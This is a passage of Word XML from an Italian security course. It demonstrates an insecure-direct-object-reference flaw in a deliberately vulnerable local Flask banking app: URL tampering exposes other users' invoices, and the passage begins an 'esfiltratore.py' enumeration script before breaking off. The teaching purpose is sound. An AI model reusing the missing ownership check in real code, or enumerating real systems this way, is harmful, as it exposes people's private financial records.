        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;html&gt;&lt;head&gt;&lt;title&gt;Dashboard&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h1&gt;Dashboard&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;Utente: &lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt; (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h2&gt;Le tue fatture&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;table border="1" cellpadding="6"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;tr&gt;&lt;th&gt;ID&lt;/th&gt;&lt;th&gt;Data&lt;/th&gt;&lt;th&gt;Descrizione&lt;/th&gt;&lt;th&gt;Importo&lt;/th&gt;&lt;/tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or f in fatture %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;td&gt;&lt;a href="/fattura/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/a&gt;&lt;/td&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;td&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f[3] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/td&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;td&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/td&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;td&gt;{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f f[2] &gt;= 0 %}+{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%.2f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"|format(f[2]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> €&lt;/td&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/table&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;hr&gt;&lt;a href="/logout"&gt;Esci&lt;/a&gt; | &lt;a href="/"&gt;Home&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], ruolo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ruolo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], fatture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mie_fatture)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cancella il vecchio database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">così le tabelle vengono ricreate con quella nuova:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">del bancapiccola.db    # Windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm bancapiccola.db     # macOS / Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia l’app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="259"/>
    <w:bookmarkStart w:id="260" w:name="verifica-del-comportamento-normale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica del comportamento normale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser, fai login come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vai alla dashboard. Vedi le sue due fatture (id 1 e 2). Clicca su una: la fattura si apre, vedi i dettagli.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tutto come previsto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="260"/>
    <w:bookmarkEnd w:id="261"/>
    <w:bookmarkStart w:id="263" w:name="primo-attacco-vedere-le-fatture-altrui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="514" w:name="sec_6_4"/>
      <w:r>
        <w:t xml:space="preserve">6.4 Primo attacco: vedere le fatture altrui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ancora loggato come Mario,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">modifica manualmente l’URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella barra del browser. Cambia da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId47">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/fattura/3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mostra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Intestatario: giulia, Bonifico stipendio FIAT-Stellantis, +2150,00 €</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mentre nella sessione del browser sei loggato come Mario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3401568"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_15_la_pagina_fattura_3_mostra_Intestatario_giulia_Bonifico_stip.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3401568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vedi una fattura di Giulia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mario non aveva autorizzazione a vederla, ma il server non ha controllato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura/4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura/5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura/6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">… vedi tutte le fatture di Giulia. Prova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura/8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedi una fattura di Luca. Sei dentro a tutto il database delle fatture,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">senza nessuno strumento di hacking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Solo il tasto Backspace e la barra dell’URL.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="262" w:name="cosa-è-successo-riga-per-riga-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è successo, riga per riga</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riguarda il codice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura(fattura_id):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           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ autenticato?  → SÌ (Mario lo è)</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cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"... WHERE fatture.id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (fattura_id,))   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ controllo proprietà?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manca completamente il controllo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">questa fattura appartiene davvero all’utente che l’ha richiesta?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La query è correttamente parametrizzata (niente SQL Injection), ma esegue letteralmente quello che le si chiede: dammi la fattura con id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;fattura_id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Senza filtri, senza controlli, senza domande.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mario è autenticato. Fine della verifica server-side. Tutto il resto è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fiducia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— fiducia che Mario non vada a cliccare su URL strani. Fiducia mal riposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="262"/>
    <w:bookmarkEnd w:id="263"/>
    <w:bookmarkStart w:id="265" w:name="X57c61383d14295596bc6fefb8915ba0c5e54c22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="sec_6_5"/>
      <w:r>
        <w:t xml:space="preserve">6.5 Da attacco singolo a data breach: l’enumerazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedere la fattura di un singolo altro utente è una violazione di privacy fastidiosa. Ma il vero disastro non è qui: è quando l’attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">automatizza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la stessa operazione per scaricare l’intero database.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="264" w:name="lo-script-di-esfiltrazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo script di esfiltrazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri un nuovo file in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">esfiltratore.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</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re</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Login come Mario per ottenere il cookie di sessione</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sessione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
